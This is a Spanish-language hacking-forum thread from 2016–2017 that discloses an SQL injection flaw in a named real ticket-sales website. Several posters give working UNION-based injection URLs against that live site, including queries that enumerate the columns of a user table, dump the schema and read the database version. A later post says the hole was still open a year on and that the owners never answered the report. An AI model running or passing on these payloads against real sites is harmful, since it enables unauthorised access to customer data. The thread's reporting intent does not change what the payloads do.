[ SQLi ] www.1000tickets.com.ar

HATI · Febrero 21, 2016, 01:47:53 PM

****************************************************
SQLi No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
****************************************************

> Site: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

> Descripción del site: venta de entradas para conciertos y demás.

> Descripción de la vulnerabilidad:

-Se encuentra un síntoma de vulnerabilidad frente a SQLi.

-Se halla el tipo de inyección y se comprueba manualmente y mediante SQLHelper

-Tras esto se puede proceder a la búsqueda de información sensible, que puede ser utilizada con fines no éticos.

Tratandose de una página de venta de entradas, la información que contiene esta base de datos puede ser peligrosa si cae en malas manos.

Método manual:

Payload:

Código: php

http://www.1000tickets.com.ar/ficha.php?id=7-1+UNION+SELECT+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=char(116,98,108,95,117,115,117,97,114,105,111)--

Método automático con SQLHelper:

Vulnerabilidad reportada por la comunidad de Underc0de.

Autor: hati

arthusu · Febrero 21, 2016, 03:10:53 PM

Código: text

http://www.1000tickets.com.ar/ficha.php
?id=-91 union select 1,(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!=0x696e666f726d6174696f6e5f736368656d61 and(@a)in (@a:=concat(@a,table_schema,0x203e20,table_name,0x3e,column_name,0x3c62723e))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -

EPSILON · Febrero 21, 2016, 03:34:37 PM

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

Código: text

http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON

HATI · Febrero 21, 2016, 09:01:19 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.
Código: text
http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
Saludos!, EPSILON

Lo realicé de manera manual también, pero tienes razón en que debería haber puesto el payload, no me di cuenta, problema solucionado.
Gracias por avisar @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, ¿podría recibir ayuda para comunicar la vulnerabilidad?

blackdrake · Febrero 22, 2016, 07:54:06 AM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.
Código: text
http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
Saludos!, EPSILON
Lo realicé de manera manual también, pero tienes razón en que debería haber puesto el payload, no me di cuenta, problema solucionado.
Gracias por avisar @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, ¿podría recibir ayuda para comunicar la vulnerabilidad?

Quieres reportarlo tu? o que lo haga la comunidad por ti?

Saludos.

HATI · Febrero 22, 2016, 08:03:45 AM

Si es posible que la comunidad lo haga por mi lo agradecería @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, y también gracias a ti por responderme.

blackdrake · Febrero 22, 2016, 09:47:26 AM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si es posible que la comunidad lo haga por mi lo agradecería @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, y también gracias a ti por responderme.

Excelente, nos encargamos entonces!

Saludos.

HATI · Febrero 22, 2016, 11:48:52 AM

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta gracias a ti a la comunidad de Underc0de

xyz · Febrero 20, 2017, 07:02:49 PM

No se si revivir el post.

La vulnerabilidad sigue activa.

Código: php


http://www.1000tickets.com.ar/listado.php?idcat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Saludos.

blackdrake · Febrero 21, 2017, 01:35:03 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No se si revivir el post.

La vulnerabilidad sigue activa.
Código: php
http://www.1000tickets.com.ar/listado.php?idcat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Saludos.

Si, nunca contestaron al correo y obviamente tampoco lo fixearon xD

[ SQLi ] www.1000tickets.com.ar

HATI

Febrero 21, 2016, 01:47:53 PM Ultima modificación: Marzo 07, 2016, 03:01:21 AM por EPSILON

arthusu

Febrero 21, 2016, 03:10:53 PM #1

EPSILON

Febrero 21, 2016, 03:34:37 PM #2 Ultima modificación: Febrero 21, 2016, 03:36:18 PM por EPSILON

HATI

Febrero 21, 2016, 09:01:19 PM #3

blackdrake

Febrero 22, 2016, 07:54:06 AM #4

HATI

Febrero 22, 2016, 08:03:45 AM #5

blackdrake

Febrero 22, 2016, 09:47:26 AM #6

HATI

Febrero 22, 2016, 11:48:52 AM #7

xyz

Febrero 20, 2017, 07:02:49 PM #8 Ultima modificación: Febrero 20, 2017, 08:08:43 PM por xyz

blackdrake

Febrero 21, 2017, 01:35:03 PM #9